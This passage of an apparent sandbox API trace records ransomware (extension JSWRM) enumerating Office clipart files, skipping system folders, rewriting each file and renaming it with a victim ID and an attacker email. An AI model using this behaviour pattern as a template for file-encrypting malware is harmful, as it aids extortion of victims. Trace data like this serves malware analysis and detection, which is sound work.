lpMultiByteStr="J0182689.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0086.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0086.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182689.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182689.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182689.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0086.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0086.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.364] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16615) returned 1 [0086.364] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40e0) returned 0x24d210 [0086.365] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x40e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x40e0, lpOverlapped=0x0) returned 1 [0086.368] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.368] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x40e0, lpOverlapped=0x0) returned 1 [0086.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.368] CloseHandle (hObject=0x314) returned 1 [0086.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0086.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0086.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0086.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0086.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0086.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0086.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0086.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0086.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.369] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f48, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0182888.WMF", cAlternateFileName="")) returned 1 [0086.369] lstrcmpiW (lpString1="J0182888.WMF", lpString2=".") returned 1 [0086.369] lstrcmpiW (lpString1="J0182888.WMF", lpString2="..") returned 1 [0086.369] lstrcmpiW (lpString1="J0182888.WMF", lpString2="...") returned 1 [0086.369] lstrcmpiW (lpString1="J0182888.WMF", lpString2="windows") returned -1 [0086.369] lstrcmpiW (lpString1="J0182888.WMF", lpString2="recovery") returned -1 [0086.369] lstrcmpiW (lpString1="J0182888.WMF", lpString2="perflogs") returned -1 [0086.369] lstrcmpiW (lpString1="J0182888.WMF", lpString2="documents and settings") returned 1 [0086.370] lstrcmpiW (lpString1="J0182888.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.370] lstrcmpiW (lpString1="J0182888.WMF", lpString2="system volume information") returned -1 [0086.370] lstrcmpiW (lpString1="J0182888.WMF", lpString2="msocache") returned -1 [0086.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0086.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182888.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182888.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182888.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0086.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182888.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182888.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182888.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0086.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0086.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0086.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.370] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24392) returned 1 [0086.370] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f40) returned 0x24d210 [0086.370] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5f40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5f40, lpOverlapped=0x0) returned 1 [0086.373] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.373] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5f40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5f40, lpOverlapped=0x0) returned 1 [0086.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.374] CloseHandle (hObject=0x314) returned 1 [0086.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0086.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0086.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0086.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0086.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0086.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0086.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.374] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0086.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0086.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0086.375] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0182898.WMF", cAlternateFileName="")) returned 1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2=".") returned 1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="..") returned 1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="...") returned 1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="windows") returned -1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="recovery") returned -1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="perflogs") returned -1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="documents and settings") returned 1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="system volume information") returned -1 [0086.375] lstrcmpiW (lpString1="J0182898.WMF", lpString2="msocache") returned -1 [0086.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0086.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182898.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182898.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182898.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0086.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0086.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182898.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182898.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182898.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0086.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0086.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0086.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.376] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15150) returned 1 [0086.376] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b20) returned 0x24d210 [0086.376] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3b20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3b20, lpOverlapped=0x0) returned 1 [0086.379] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.379] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3b20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3b20, lpOverlapped=0x0) returned 1 [0086.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.379] CloseHandle (hObject=0x314) returned 1 [0086.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0086.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0086.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0086.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0086.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0086.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0086.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.379] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0086.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0086.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0086.380] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e8e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0182902.WMF", cAlternateFileName="")) returned 1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2=".") returned 1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="..") returned 1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="...") returned 1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="windows") returned -1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="recovery") returned -1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="perflogs") returned -1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="documents and settings") returned 1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="system volume information") returned -1 [0086.380] lstrcmpiW (lpString1="J0182902.WMF", lpString2="msocache") returned -1 [0086.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0086.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182902.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182902.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182902.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0086.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0086.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182902.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182902.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182902.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0086.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0086.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0086.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.381] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: 